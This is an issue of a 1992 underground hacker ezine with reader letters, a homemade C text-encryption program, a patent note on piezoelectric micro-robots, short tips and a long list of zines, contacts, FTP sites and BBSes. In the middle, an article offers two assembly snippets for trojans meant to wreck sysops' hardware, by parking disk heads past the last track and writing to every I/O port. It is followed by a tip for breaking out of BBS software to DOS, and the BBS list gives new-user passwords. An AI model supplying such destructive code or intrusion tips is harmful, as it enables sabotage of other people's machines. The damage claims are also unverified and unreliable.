Copy Link
Add to Bookmark
Report

Digital Free Press Vol 1 Issue 4

eZine's profile picture
Published in 
Digital Free Press
 · 26 Apr 2019

  


-------------------------------------------------------------------------------

######### ############ #########
########### ############ ###########
#### #### #### #### ####
#### #### #### #### ####
#### #### ######## ###########
#### #### ######## #########
#### #### #### ####
#### #### #### ####
########### #### ####
######### #### ####

DIGITAL FREE PRESS
-------------------------------------------------------------------------------
Volume 1.0 Issue 4.0
-------------------------------------------------------------------------------

* A Publication of The Underground Computing Foundation (UCF) *

* Send Subscription Requests to: dfp-req%underg@uunet.uu.net *

* Send Submissions to: hackers%underg@uunet.uu.net *

* Editor: Max Cray (max%underg@uunet.uu.net) *

Back issues can be found in the CUD archives at ftp.eff.org

[Note: BBS is not currently up. Sorry.]
------------------------------------------------------------------------------

Statement of Purpose and Disclaimer

The Digital Free Press is an uncensored forum to document current
activities in and of the world of modern technology. It is published under the
premise that it is better to know, rather than not know, so no attempt is made
to hide any information no matter how dangerous it may be. Information is a
double edged sword. It is neither good nor bad, and can be used for either
good or bad. Warning: Some information in this document could be used for
illegal activities. Use at your own risk. Articles are the opinion of the
authors listed, and not of the editor (unless of course the editor wrote
it). Information is not verified for accuracy.

------------------------------------------------------------------------------
------------------------------------------------------------------------------

In this Issue:

1. Mail to Max
2. Privacy and Electronic Mail by GodNet Raider
3. Hardware Destructive Code by The BBC
4. Invisible Killer Chips by Jean-Bernard Condat
5. Short Takes:
- Hacking Remote Access by PeeWee
- Little Black Book of Viruses Review by PeeWee
- Where to find Online Library Catalogs, and
How to get info about DEC's new Alpha chip by Wes Morgan
- Compiling C programs on a VMS system by Max Cray
6. Paid Advertisement by UPi
7. FutureCulture (Condensed) by Hawkeye

------------------------------------------------------------------------------
##############################################################################
------------------------------------------------------------------------------

Mail to Max:
-----------

Date: Tue, 28 Apr 92 14:05 GMT
From: Jean-Bernard Condat <uunet!mcimail.com!0005013469>
To: Max Cray <underg!max>
Subject: RE: DFP #3 Bounce Test

Dear Max:

The scene in France is very clear: nothing. The police look at what the
Chaos Computer Club france (CCCF) make... and the secret services work
on several formations for all the people! A lot of anti-virus softwares
are available, but some softs are sell with viruses in it (!). I paid
US$1,000 pro week like Craig Neidorf... because I "have perhaps possess
one hard-to-find NUI"
! I mind that the US hacking market is the same:
you have some blue box codes available, the French hackers have some
"Carte Pastel Internationale" codes... and France Telecom don't make any
thing against that. Only some poor teenagers are arrested, but in 60%,
they don't found the good people!

Can I help you?

Jean-Bernard Condat, General Secretary, CCCF
B.P. 8005
69351 Lyon Cedex 08, France

[Editor's note: Of course you can help! Send all your information to:
hackers%underg@uunet.uu.net and I will try to edit it
to make it even more useful, and then I will publish
it in the DFP!]

-----------------------------------------------------------------------------

From: Root of all Evil Account <uunet!stormking.com!root>
Subject: Re: Digital Free Press #3
To: underg!max (Max Cray)
Date: Sun, 26 Apr 92 19:38:24 EDT
X-Mailer: ELM [version 2.3 PL11]

Dear Mr. Cray,

Recently, 4 users of this system complained about receiving
copies of your "Digital Free Press". As the distribution site for Phrack,
I in no way discourage freedom of electronic speech. I do, however,
discourage "cyber junk-mail". Each of the users mentioned they had not
specifically asked for this to be sent to them.

In the future, please verify any subscriptions of your newsletter
through me.

The Root of all Evil at StormKing.Com

[Editor's note: 'Mr. Cray' ... I like that!]

------------------------------------------------------------------------------
##############################################################################
------------------------------------------------------------------------------

From: gnr@tsf.UUCP (GodNet Raider)
Date: Wed, 26 Feb 92 05:17:53 EST
Organization: The CyberUnderground


-=[ Privacy and electronic mail ]=-

-or-

/*************************************/
/* How to whisper over a crowded net */
/*************************************/

- written by -
GodNet Raider
- of -
The CyberUnderground

-=[ "Information is the greatest weapon of power to the modern wizard." ]=-

]----------------------------------------------------------------------------[

Introduction:
-------------

A while back I was listening to a pro password sysop talk about the
'evils' of hacking. His biggest point was that 'a hacker could read
private mail from/to the person whose' account they have accessed. The
right or wrong of that point I will leave to others to discuss/flame/get
flamed over. What stuck with me was the fact that he like many other
sysops and system admin, their friends and whoever else can access the
system at high level (or in the case of DOS, can pound the local
keyboard), can also read any text messages they wish. Some even feel that
it is a god given right to read any mail, strange seeing that the
government and even ma bell (remember the phone chase from _the_cuckoo_
nest_ they could not get the phone number for they did not have a valid
warrant in in that state) must get a search WARRANT to do the same thing.
Well it seems what they feel god has giveth them, GodNet Raider can
taketh away.

So I thought there must be a simple way to make truly private
messages to protect all from this 'hacker threat' and nosey sysops
(etc..) as well (without having to resort to using DES and uuencode,
for it is slow and a bit of a hassle to use a lot (but it should be noted
this is the most secure method). Then I remembered an article I read
in The LOD/H Technical Journal, Issue #3. [Editor's note: The Legion
of Doom Technical Journals can be found in the CUD archives at
ftp.eff.org. Highly recommended.] It contained a basic BASIC
program and explanation to a simple text encryption method using
cellular automatons by The Mentor (strongly recommended reading for
understanding the theory behind the method).

After converting the BASIC code for the second program to C (under
Minix) I proceeded to make changes to (hopefully improve) it. What
I came up with is included at the end of this file (MsgLock.c).

Of the changes made:

Added the use of stdin/stdout to support a wide extent of I/O
methods.

Used multiple cells in defining shift amount.

Allowed the pass though of char.s not in aszValid array (raw
output) to keep message integrity (returns and tabs that a
message may gain/lose in some online editors).

Added code to expand small key strings to fill out key cells.

So I hope you find MsgLock of use and remember...

WMIe`H-h(`[ga0)9oW-/V

MsgLock wish list/projects:
---------------------------

MsgLock is by no means complete following are some suggestions for
the obsessed prodigies out there who want to expand on the basic idea.

For a more private version one can change:

The size of the key cells (#define WIDTH xx).

The expansion methods used to fill out the initial key cells.

The key cell update method.

The order of the char.s in aszValid.

Adding/removing char.s from aszValid.

Msglock could use a way to know when an encoded area begins and
ends (like the 'begin'/'end' in uuencoded files) to save post
processing on net messages.

Removal of char.s used in quoted messages so that it will not try
to process (cook) char.s added to quoted messages.

Changes to allow it to be treated like a ASCII Xfer protocol in
term packages (qmodem, boyan, kermit)/online by bbs packages (RBBS,
etc..) as an auto encrypt for chat/general online use.

Or many others I have not thought of.

MsgLock source code:
--------------------

MsgLock was compiled in Minix using the ACK compatible compiler and
under DOS using Turbo C++ using ANSI C compatible commands.

Usage:
msglock [-d] Key

-d(code) : Decode stdin to stdout (MsgLock otherwise
encodes stdin to stdout. -d is only
used for decoding if followed by a
space and is the first parameter following
the command ('-dKEY' will be used as a key
to encode stdin, use '-d -dKEY' instead to
decode)

Key : String of char. used to encode/decode stdin
to stdout. String can contain spaces.

Examples:

msglock key <file1.txt >file2.txt
Encode file 'file1.txt' to 'file2.txt' using the key string
'key'.

msglock -d this is the key <foo
Decode the file 'foo' to the screen using 'this is the key'
as the key string.

msglock knowledge is power >com1 (/dev/tty1 for minix users)
Encode keyboard input (using the key 'knowledge is power')
directly to the device/terminal on com port 1.

+---- Cut Here ----+---- Cut Here ----+---- Cut Here ----+---- Cut Here ---+

/*
MsgLock.c
by GodNet Raider.
Based on a program for encrypting using cellular automaton
by The Mentor

Allows encoding of text for transmittal over computer nets and BBSs.

This program is not to DES standards and should not be considered 100%
secure by any means.
*/


#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <ctype.h>

#define TRUE 1
#define FALSE 0
#define SPACE 0x20
#define WIDTH 50
#define MAX_CELLS (WIDTH + 2)

char
*aszErrMsg [] =
{
"Usage: msglock [-d(ecode)] Key",
"Write error on stdout.",
"Read error on stdin."
},
asCells [2] [MAX_CELLS],
/* Not using 0 offset to prevent errors caused by the fact that */
/* (0 % x == x % x). */
aszValid [] = "\xff\ABCDEFGHIJKLMNOPQRST"
"yz1234567890!@#$%^&*()-=_+[]{};:'.><,/?\\| \`\"",
fActive = 0,
fDecode = FALSE;

void
main (int, char **),
FatalErr (int);

void main (argc, argv)
int
argc;
char
*argv [];
{
char
sWorkKey [WIDTH],
cInChar;
int
nArgCnt = 1,
nTmpCnt1 = 1,
nTmpCnt2 = 0,
nValidSize;

nValidSize = strlen (aszValid) - 1;
/* Check for missing parameters. */
if (argc == 1)
FatalErr (1);
/* Check if decode, else default to encode */
if (*argv [1] == '-' && toupper (argv [1] [1]) == 'D' && !argv [1] [2])
{
/* Check for missing parameters, again. */
if (argc < 3)
FatalErr (1);
fDecode = TRUE;
nArgCnt++;
}
/* Move key in to encode/decode key cells to the max set by WIDTH. */
while (nTmpCnt1 <= WIDTH && nArgCnt < argc)
if (argv [nArgCnt] [nTmpCnt2])
asCells [1] [nTmpCnt1++] =
argv [nArgCnt] [nTmpCnt2++];
else
if (++nArgCnt < argc)
{
asCells [1] [nTmpCnt1++] = SPACE;
nTmpCnt2 = 0;
}
nTmpCnt2 = 1;
/* Fill unused cells in key cells up to WIDTH. */
while (nTmpCnt1 <= WIDTH)
asCells [1] [nTmpCnt1++] = asCells [1] [nTmpCnt2++] ^
asCells [1] [nTmpCnt1 - 1];
/* Process stdin. */
while ((cInChar = (char) getc (stdin)) != EOF)
{
/* Check if char. is in aszValid list, if so cook, */
/* else let it pass though raw. */
nTmpCnt2 = nValidSize;
while (nTmpCnt2 && aszValid [nTmpCnt2] != cInChar)
nTmpCnt2--;
if (nTmpCnt2)
{
/* Update key cells, excluding head and tail. */
for (nTmpCnt1 = 1; nTmpCnt1 <= WIDTH; nTmpCnt1++)
asCells [fActive] [nTmpCnt1] =
asCells [fActive ^ 1] [nTmpCnt1 - 1] ^
(asCells [fActive ^ 1] [nTmpCnt1] |
asCells [fActive ^ 1] [nTmpCnt1 + 1]);
/* Update head of key cells. */
asCells [fActive] [0] =
asCells [fActive ^ 1] [WIDTH + 1] ^
(asCells [fActive ^ 1] [0] |
asCells [fActive ^ 1] [1]);
/* Update tail of key cells. */
asCells [fActive] [WIDTH + 1] =
asCells [fActive ^ 1] [WIDTH] ^
(asCells [fActive ^ 1] [WIDTH + 1] |
asCells [fActive ^ 1] [0]);
/* Get char shift offset value */
cInChar = (asCells [fActive] [1] & 0x7f) % WIDTH;
/* Get char shift value */
cInChar = asCells [fActive] [(cInChar ? cInChar : WIDTH)];
/* Switch to updated key cells for next pass. */
fActive ^= 1;
/* If decode is TRUE then shift left though aszValid, else */
/* shift right (negative numbers in cInChar reverses this). */
if (fDecode)
{
/* Needed to bypass warning message (turbo C++ gets */
/* confused sometimes when it sees a single '=' in */
/* an 'if' statement, even though it is bracket to be */
/* evaluated before the 'if'). */
#ifdef __TURBOC__
if ((cInChar = nTmpCnt2 - cInChar) != 0)
#else
if ((cInChar = nTmpCnt2 - cInChar))
#endif
{
if ((cInChar %= nValidSize) < 1)
cInChar = nValidSize + cInChar;
}
else
cInChar = nValidSize;
}
else
if (!(cInChar = (nTmpCnt2 + cInChar) % nValidSize))
cInChar = nValidSize;
/* Write cooked char. to stdout. */
if (putc (aszValid [cInChar], stdout) == EOF &&
ferror (stdout))
FatalErr (2);
}
else
/* Write raw char. to stdout. */
if (putc (cInChar, stdout) == EOF && ferror (stdout))
FatalErr (2);
}
/* Check for file error on stdin. */
if (ferror (stdin))
FatalErr (3);
/* End program run. */
exit (0);
}

void FatalErr (ErrNum)
int
ErrNum;
{
/* In every life a little rain must fall. */
/* Complain and bail out. */
fprintf (stderr, "
\n%s\n", aszErrMsg [ErrNum - 1]);
exit (ErrNum);
}

+---- Cut Here ----+---- Cut Here ----+---- Cut Here ----+---- Cut Here ---+

]============================================================================[

...uunet!underg!tsf!gnr (GodNet Raider)
-=[ "
You gotta learn to listen, before you learn to play." ]=-

------------------------------------------------------------------------------
##############################################################################
------------------------------------------------------------------------------

To: hackers@tsf.UUCP
Subject: Text phile 5.
From: bbc@tsf.UUCP (The BBC)
Organization: The CyberUnderground

Da da.. da da dup... Da da.. da da dup... Da da.. da da dup...
Yes boys and girls... It time once again for your favorite waste
of humanity... Yes it the BBC's Hackit J. Squirrel and crashwinkel
The moose show... So put your antlers on and lets now go to the
magical land of frostbite Falls Min. An see what our heroes are up
to...

Golly gee Hack... Every time I crash a sysops hard drive with
a trojan... they just reformat the drive and reinstall the
software and are up and running again... I wish there was a way
to bring them down that would really give them something to think
about...

Maybe there is lets go see Mr. Woopie and his 3D BBC,
crashwinkel...

So our HEROES went to see Mr. Woopie... But where confronted
by Tennessee tuxedo and his friend chumly... But a quick squeeze
of the trigger on their semi automatic weapons and a short thank
you note to the NRA... An they where in...

So you boys want to know how to cause more than just data loss
with trojans? Well lets ask the 3D BBC...

Thank you Mr. Woopie... It sounds like you boys want to hear
about how to force hardware problems using software... 'Wow
Hacket.I only thought you could only do major data loss with
trojans.'... Yes but there are other nasties you could pull if you
want to...

Take this simple bit of code for example:

===============================================================
mov Ax, 0508h
mov CX, 8001h
mov DX, 0000h
int 13
===============================================================

This small bit of codes just moves the disk heads past the inner
most track... 'But what good is that BBC?'... Well our furry little
friend... Some disks will lock and the only way to fix it is to open
the bugger up... An since the only way to be sure this will or won't
work is to try it... Well...

Or how about this bit of code:

===============================================================
xor Al, Al
NextPass:
mov DX,ffffh
NextPort:
out DX, AL
dec DX
jnz NextPort
inc AL
jmp short NextPass
===============================================================

We like to call it armageddon... 'Ohhh, Ahhhh'... It simply
looks for and writes to every port in the system... An based
on the hardware in the system it can... Toast monitors, Change CMOS
values, Change stepper rates, Change voltages (to burn/disable cards,
boards, and memory), Reek havoc on co-processers, Disable networks,
As well as other nasties too numerous to mention... Seeing that there
is some time involved in writing all those ports... The poor fool
has some time to guess what is going on and shut the computer down
(oh about 4 min.)... 'But we can't test things like that on our
computers.' 'How will we know if it will work or not.'... Who said
to test it on your systems... Not that we would suggest you test
it on others systems... That would make you a wast of humanity
like...

The BBC

----------------------------------------------------------------------
...uunet!galaxia!divinity!tsf!bbc (The BBC)
-=[ "
Anarchy is never HAVING to say you're sorry." ]=-

------------------------------------------------------------------------------
##############################################################################
------------------------------------------------------------------------------

Invisible Killer Chips Now Available


Intelligence Newsletter (10 rue du Sentier, 75002 Paris, France)
No. 186 (Jan. 29, 1992), page 2, ISSN 0997-7139
By: Jean-Bernard Condat (CCCF, B.P. 8005, 69351 Lyon Cedex 08, France)


The military use of computer viruses is often overblown, if not just
simple disinformation as in the recent Iraqi case. But researchers at
Boston University have developed and patented (U.S. patent 5 049 775)
an infinitely more offensive and effective anti-computer agent: the
silicon ant. Micro-electronics has perfected technologies for making
toys and machines so small that they are invisible.

Using piezoelectric ceramics which expand or contract under an
electric current, the researchers constructed a microscopic ship with
three "
legs" on each side and a "cutter" in front. By alternating
current in different sides of each "
leg", it bends forward or backward.

Under remote control the killer chips can be "
walked" into a computer
and cut up other microscopic chips, turn around and "
walk" away, leaving
invisible damage in the computer system. The killer chips could be solar
powered and therefore have an indefinite life-span.


PATENT DESCRIPTION


008245420 WPI Acc No: 90-132421/17
XRPX Acc No: N90-102550
Piezoelectric micro-machine or robot basic operating unit - made by
covering silicon cantilever beams projecting from frame with
piezoelectric material when applied voltages cause them to deflect
Patent Assignee: (UYBO-) BOSTON UNIV
Author (inventor): SMITS J G
Number of Patents: 002
Patent Family:
CC Number Kind Date Week
WO 9003665 A 900405 9017 (Basic)
US 5049775 A 910917 9140
Priority Data (CC,No,Date): US 251565 (880930);
Applications (CC,No,Date): WO 89US4129 (890921);
EP and/or WO Language: English
EP and/or WO Cited Patents:
No.SR.Pub
Designated States (National): JP (Regional): AT; BE; CH; DE; FR; GB; IT; LU
; NL; SE

Abstract (Basic): WO 9003665

An electrical micromachine is made by securing films (20,22) of
piezoelectric material to the top surfaces (16,18) of crystalline
silicon beams (12,14) projecting from a crystalline silicon body (10)
to form a bimorph structure. A potential applied across the ends
(24,26) of the piezoelectric films causes the beams to deflect. The
piezoelectric material used is zinc oxide.
A number of such micromachines can be assembled to form a robot,
and when a foot (30) is provided the machine can move itself along a
surface by sequential deflecting and straightening of the beams. The
foot can be associated with a toothed wheel to produce rotary motion.
The micromachine may be solar powered, and can be associated with
sensors or a microprocessor with programmable memory.
USE - Microsurgical tools, and robots for grasping, carrying or
cutting tasks. @(33pp Dwg.No.1/10)@

Abstract (US): 9140 US 5049775

The piezoelectric actuation machine comprises two cantilever beams
extending from a frame. The beams comprise a piezoelectric material
such that application of an electric potential across the material of
each beam rotationally diplaces the first and second beams relative to
each other.
An actuating member is secured between displaceable surfaces on
the beams and extends orthogonally from a plane through the beams such
that relative displacement of the beams displaces a portion of the
member in a direction orthogonal to beam displacement. A rigid object
contacting the displaced portion of the member is translated relative
to the member and the frame.
USE - For piezoelectric micromachines e.g. small robot or cutting
tool. @(17pp)@

File Segment: EPI
Derwent Class: S05; V06; X25; R46;
Int Pat Class: H01L-041/09
Manual Codes (EPI/S-X): S05-B; V06-M06D; X25-A03E


Jean-Bernard Condat
General Secretary
Chaos Computer Club France
B.P. 8005
69351 Lyon Cedex 08, France
Tel.: +33 78 61 15 88
<uunet!mcimail.com!0005013469>

------------------------------------------------------------------------------
##############################################################################
------------------------------------------------------------------------------

Short Takes:
-----------

------------------------------------------------------------------------------

From: uunet!uga.cc.uga.edu!ART30275%NUSVM.BITNET (PeeWee)

Hey, press alt-200 (on the numberpad) to access the highest level
menu in Remote Access v1.10. Often lets u shell out to DOS.

------------------------------------------------------------------------------

From: uunet!CUNYVM.CUNY.EDU!ART30275%NUSVM.bitnet (PeeWee)

Hey! have you got your copy of The little black book of
Computer viruses yet?

It's very detailed and good! I had to order it and have it
shipped over here to me, took me about 3 months (worth the wait!)
The ISBN is 0-929408020 Author: Mark Ludwig, Publisher: American Eagle

------------------------------------------------------------------------------

From: Wes Morgan <uunet!engr.uky.edu!morgan>

Obligatory Information Pointers:

List of Online Library Catalogs:
Anonymous ftp from ftp.unt.edu (129.120.1.1) in directory /pub/library.
Versions are available in plaintext, PostScript, and WordPerfect 5.0.

[Editor's note: With these lists of online library catalogs you can find out
much information by learning what libraries have the info
that you need, and then requesting it via an inter-library
loan.]

DEC's new Alpha chip (for you hardware fanatics):
Call 1-800-332-2717 and ask for the "
Alpha Packet". They'll send you
the Architecture Handbook (detailed) and more information about the
Alpha chip.

------------------------------------------------------------------------------

From: Max Cray <max%underg@uunet.uu.net>

On a VMS system you can not simply type 'CC HELLO.C' to compile a C
program. First you have to define a Link Library. This command will work
for a generic program that does not need floating point:

DEFINE LNK$LIBRARY SYS$LIBRARY:VAXCRTL

For more information use the excellent help system in VMS. Simply Type
'HELP CC'.

------------------------------------------------------------------------------
##############################################################################
------------------------------------------------------------------------------

PAID POLITICAL ADVERTISEMENT

UPi has once again returned and it no longer the shit group it used to be in
the past. UPi is a group that puts out newsletters that deals with the
H/P/C/A world. In the past, our newsletters averaged only 1 article in length
(which in size means a range of 25-50k) but now in the all new UPi newsletter
we have decided to expand it so it will contain more articles (and all quality
articles which means no more of those little shitty files that contains
useless information). What we are looking for are quality members and sites
that are willing to contribute to the group and support the group. We are
also looking for people who can freelance write for us too. We are looking
for people who are experienced in electronics and chemistry, and as well as
any of the P/H/C/A topics. If you would like to join UPi either as a site or
a member or become a freelance writer for us please send mail to The Lost
Avenger via internet e-mail to the following address Tla@Maria.Wustl.Edu or
you can contact him on his voice mail box at 416-402-0788.

The Lost Avenger/UPi

------------------------------------------------------------------------------
##############################################################################
------------------------------------------------------------------------------

From: uunet!isis.cs.du.edu!ahawks (floyd)
Subject: FutureCulture Update
To: hackers%underg@uunet.uu.net
Date: Tue, 12 May 92 20:38:20 MDT

[Editor's note: This is an edited version of Hawkeye's excellent e-mail
FutureCulture listing. It is intended to deal with the entire CyberPunk/Rave
scene and thus is rather large and comprehensive. I edited out most of the
cultural listings, and left most of the tech listings, since I intend for
the DFP to be more of a technical journal. However it is highly recommended
that you send him mail and get on the mail list.]

_____________________________________________________________________________
| |
| Magazines (hardcopy) of interest: |
|_____________________________________|

Communications of the ACM
(Association for Computing Machinery, Inc.)
-sorry, don't have the address or subscription info, but should be
available at any decent newsstand - also, the ACM has forums
available on the Internet

Cybertek
OCL/Magnitude
PO Box 64
Brewster, NY 10509
-hacking, cyberpunks, technology, culture
$10 a year

Fact Sheet Five
6 Arizona Avenue
Rensselaer, NY 12144-4502
518.479.3707
-independently-oriented reviewers of the culture
$3.50 an issue, $33 a year for 8 issue subscriptions
(unconfirmed rumors say it's no longer in production)

Hac-Tic
pb 22953, 1100 DL
Amsterdam, The Netherlands
ropg@ooc.uva.nl (Internet)
-published near that hotbed of hackers in holland/amsterdam
European counterpart to 2600
$2.30 US an issue

[Editor's note: The above is not in English! Is there a translator?]

Intertek: The Cyberpunk Journal
Steve Steingerg
325 Ellwood Beach #3
Goleta, CA 93117
steve@cs.ucsb.edu
-formerly Frank Drake's W.O.R.M
hacking, cyberspace, interviews, designer drugs, cryonics, etc.
$2.50 an issue

Iron Feather Journal
PO Box 1905
Boulder, CO 80306
-hacking, anarchy, techno-phun
$2 an issue

Mondo 2000
PO Box 10171
Berkeley, CA 94709
415.845.9018 (phone)
415.649.9630 (fax)
mondo2000@mcimail.mci.com
-your definitive guide to all things cyberpunk and some things not
should be available at any decent newsstand
was Reality Hackers and High Frontiers
$21 for 5 issues (published quarterly)

TAP
PO Box 20264
Louisville, KY 40250
-the original phreaker's rag, begun by Abbie Hoffman
formerly YIPL (Youth International Party Line) and then it was
Technilogical Assistance Program, now it's
Technilogical Advancement Party
hacking, anarchy, some political
has undergone many publishing changes
operates Blitzkrieg BBS @ 502.499.8933
TAP-Online also available on some BBSes / FTP sites

2600
PO Box 752
Middle Island, NY 11953-0752
516.751.2600 (office)
516.751.2608 (fax)
2600@well.sf.ca.us (Internet)
-the original infamous hacker's zine
subscriptions are $21 for 4 issues (published quarterly)
back issues are $25 / year

[Editor's note: They also have meetings on the first friday of the month in
New York City.]

Whole Earth Review
PO Box 38
Sausalito, CA 94966-9932
(Whole Earth runs The Well [Whole Earth Lectronic Link] - well.sf.ca.us)
-combines new age, techno-culture, california fads, etc.
should be available at any decent newsstand
$20 year for subscriptions

____________________________________________________________________________
| |
| E-Magazines and digests: |
|_____________________________|

[Editor's note: I edited out the listings that did not have references on how
to get them. Suffice it to say that there are many more journals available
that are not listed here. See some of the Internet and BBS listings for
places to find these items.]

Activist Times Incorporated
gzero@tronsbox.xei.com
-political, hacking, anarchy

Computers and Academic Freedom
listserv@eff.org <add comp-academic-freedom-news>
-computing freedom, mostly deals with college campuses

Computer Underground Digest
tk0jut2@niu.bitnet

Digital Free Press
dfp-req%underg@uunet.uu.net
-hacking, information, etc.

EFF News (EFFector Online)
effnews-request@eff.org
-sends out EFFector Online, the Electronic Frontier foundation's
e-journal

Freaker's Bureau International
au530@cleveland.freenet.edu
-anarchy, hacking, cyberpunk

Informatik
inform@doc.cc.utexas.edu
-hacking, phreaking, computer underground, cyberpunk, etc.

Network Information Access
nia@nuchat.sccsi.com
-hacking, computer underground, etc.

Phantasy
Mercenary@f515.n141.z1.fidonet.org
-anarchy, hacking

Phrack
phracksub@stormking.com
-need we say more - the one, the only hacking e-zine...

Pirate Radio
brewer@ace.enet.dec.com
-pirate radio

RISKS Digest
risks-request@csl.sri.com
-the RISKS of computing in our lives

Telecom Privacy Digest
telecom-priv-request@pica.army.mil
-deals with privacy aspects of telecommunications
most of the conversation revolves around Caller-ID and such

Telecom Digest
telecom-request@eecs.nwu.edu
-deals with all aspects of telecommunications

Virus-l Digest
krvw@cert.sei.cmu.edu
(also virus-l on BITNET)
-discussion of viruses and all aspects of 'em

Worldview - Der Weltanschauung
fox@nuchat.sccsi.com
-hacking, computer underground, church of subgenius, political, etc.

_____________________________________________________________________________
| |
| E-Mail Addresses: |
|____________________|

(please use care and consideration when mailing to these people)

Aristotle uk05744@ukpr.uky.edu
John Perry Barlow barlow@well.sf.ca.us
Dorothy Denning denning@cs.georgetown.edu
Peter J Denning pjd@cs.gwu.edu
Desert Fox dfox@taronga.com
Dispater dispater@stormking.com
The EFF eff@eff.org
Freaker's Bureau Int'l au530@cleveland.freenet.edu
Gatsby gatsby@ryptyde.tcs.com
Mike Godwin mnemonic@eff.org
Emmanuel Goldstein emmanuel@well.sf.ca.us
Ground Zero gzero@tronsbox.xei.com
Hactic ropg@ooc.uva.nl
Hawkeye (put this art. together)ahawks@nyx.cs.du.edu
Intertek steve@cs.ucsb.edu
Judge Dredd elisem@nuchat.sccsi.com
Mitch Kapor mkapor@eff.org
Knight Lightning (Craig Neidorf)knight@well.sf.ca.us
kl@stormking.com
Lord Macduff macduff@nuchat.sccsi.com
Mentor (Lloyd Blankenship) cs.utexas.edu!dogface!fnordbox!loydb
Mondo 2000 mondo2000@mcimail.mci.com
Gordon Meyer 72307.1502@compuserve.com
Peter G Neumann neumann@csl.sri.com
Pengo (Hans Heubner) hans@trabant.at
John S Quarterman jsq@tic.com
Len Rose len@netsys.netsys.com
RU Sirius rusirius@well.sf.ca.us
Cliff Stoll cliff@cfa.harvard.edu
Michael Synergy synergy@metaphor.com
Jim Thomas tk0jut1@niu.bitnet
Tuc tuc@stormking.com
2600 2600@well.sf.ca.us

[Editor's note: How about Eric S. Raymond author of 'The New Hacker's
Dictionary'? He is at: eric@snark.thyrsus.com.

Also Belgorath provides these alternate addresses:

Hans Huebner (aka Pengo) is hans@trabant.artcom.de, or
hans@skoda.vie.artcom.de

Cliff Stoll (No known alias) is stoll@earthquake.berkeley.edu]

_____________________________________________________________________________
| |
| FTP Sites: |
|______________|

(all of these sites carry either computer underground information, information
on drugs, music, subgenius, etc.)

18.26.0.36 lcs.mit.edu
18.26.0.179 zurich.ai.mit.edu
128.6.4.15 pyrite.rutgers.edu
128.6.60.6 quartz.rutgers.edu
128.8.2.114 sayshell.umd.@edu
128.83.132.20 ??
128.95.136.1 milton.u.washington.edu
128.100.3.6 ftp.cs.toronto.edu
128.135.46.7 ??
128.135.252.7 ??
128.174.5.50 @uxc.@cso.@uiuc.@edu
128.214.6.100 @nic.@funet.fi
128.235.33.1 ??
128.252.135.4 @wuarchive.@wustl.@edu
129.173.4.5 cs.dal.ca
130.18.64.2 ??
130.43.2.3 bric-a-brac.apple.com
130.56.96.2 ??
130.71.192.18 stolaf.edu
130.234.0.1 jyu.fi
131.188.31.3 faui43.informatik.uni-erlangen.de
131.210.1.4 cs.uwp.edu
133.137.4.3 ??
134.60.66.21 ??
134.95.132.2 aix370.rrz.uni-koeln.de
137.39.1.9 uunet.uu.net
146.169.3.7 ??
192.88.144.4 eff.org
192.88.209.5 cert.sei.cmu.edu
_____________________________________________________________________________
| |
| BBSes: |
|__________|
201.451.3063 Wrong Number
203.485.0088 Rune Stone
203.628.9660 Dark Shadows
206.454.0075 Manta lair
209.526.3194 Tequilla Willie's Great Subterranean Carnival
214.324.3501 KeelyNet
214.522.5321 Dead Zone
215.449.1902 Time Enough for Love BBS
303.438.1481 The Kracker Box
303.871.4824 Nyx (public access unix)
312.528.5020 Ripco
401.847.2603 Underground
414.789.4210 PC Exec
415.332.6106 The Well
415.472.5527 The Cyberden
502.499.8933 Blitzkrieg
503.635.2615 Awakening Technology
512.447.4449 The Illuminati BBS
517.337.7319 Pure Nihilism
602.861.3167 Frayed Ends
617.475.6187 Convent
617.861.8976 The Works
618.549.4955 Free Speech
708.672.5426 World Trade Center
713.242.6853 Face-2-Face
718.358.9209 Switchboard
718.428.6776 Milliways
806.794.4362 Demon Roach Underground
914.761.6877 Uncensored
916.673.8412 Greenpeace's Inverted Granola Bar

--

[Editor's note: The Underground is no longer up (I moved). Perhaps at a
later date I will put it back up.

Other Boards I know about:

408.241.9760 NetCom - Network Access

408.245.7726 darkside.com (The Waffle support BBS)

408.867.7400 Spies in the Wire
Most Notorius hangout for hardened Cyber-
Criminals. Ask for access to 'The Good Stuff'
and tell them Max sent ya.

602.894.1757 Unphamiliar Territory
NUP (New user Password) 'Bunnylust'

717.361.0947 Digital Warfare
Phalcon-Skism, 40 Hex Mag, Viruses
(Sorry, forgot the NUP)

916.481.2306 Phun Line
Password 'Darkness has Fallen'

359.2.20.4198 Virus eXchange BBS in Sofia, Bulgaria
Working hours:
20:00 - 06:00 GMT (in the winter)
19:00 - 05:00 GMT (in the summer)

Also the NUP for Blitzkrieg is 'Columbian Coke'.]
_____________________________________________________________________________
| |
| Merchandise/Companies: |
|__________________________|

(a lot of the companies on this list are on the very edge of the underground,
and would not exist but for the 1st amendment - please use caution and care
when dealing with these people, and don't abuse them, otherwise you'll ruin it
for us all!)

Abbie Yo-Yo Inc.
PO Box 15
Worcester, MA 01613
-things related to Abbie Hoffman

Amok
PO Box 861867 Terminal Annex
Los Angeles, CA 90086-1867
-hard to find/underground books
catalog is a whopping $9 (400 pages)

Autodesk, Inc.
2320 Marinship Way
Sausalito, CA 94965
-makers of Chaos software. $59.95

Books by Phone
Box 522
Berkeley, CA 94701
800.858.2665 (orders)
510.548.2124 (info)
-large library of hard-to-find books related to CP, drugs, etc.
nice resource, but you pay a lot for it :-)

Consumertronics
2011 Crescent Dr.
PO Drawer 537
Alamogordo, NM 88310
505.434.0234
500.434.0234 (fax - orders only)
-hacking/phreaking manuals

Feral House Productions
PO Box 861893
Los Angeles, CA 90086-1893
-obscure books

Further Connections
Waves Forest
PO Box 768
Monterey, CA 93940
-fringe science

Kodak's Center for Creative Imagining
800.428.7400
-offers classes in electronic imaging "
taught by artists and industry
experts with state-of-the-art technology"
anyway, call 'em and ask 'em for their catalogue - might be decent
(at least the ad in Mondo looks nifty :-)

Loopmanics, Ltd.
PO Box 1197
Port Townsend, WA 98368
-carries a large collection of underground/hard-to-find books and stuff
send for a catalog

NewTek, Inc.
215 SE 8th St.
Topeka, KS 66603
800.843.8934
-makers of the great Video Toaster
send 'em $4.95 for a demo tape of what the Video Toaster does

Paladin Press
PO Box 1307
Boulder, CO 80306
-obscure books

Re/Search Publications
70 Romolo Street #B
San Franssico, CA 94133

Rip Off Press
PO Box 4686
Auburn, CA 96504

Sense8
1001 Bridgeway #477
sausalito, CA 94965
415.331.6318
415.331.9148 (fax)
-vr firm

Survival Books
11106 Magnolia Blvd.
North Hollywood, CA 91601

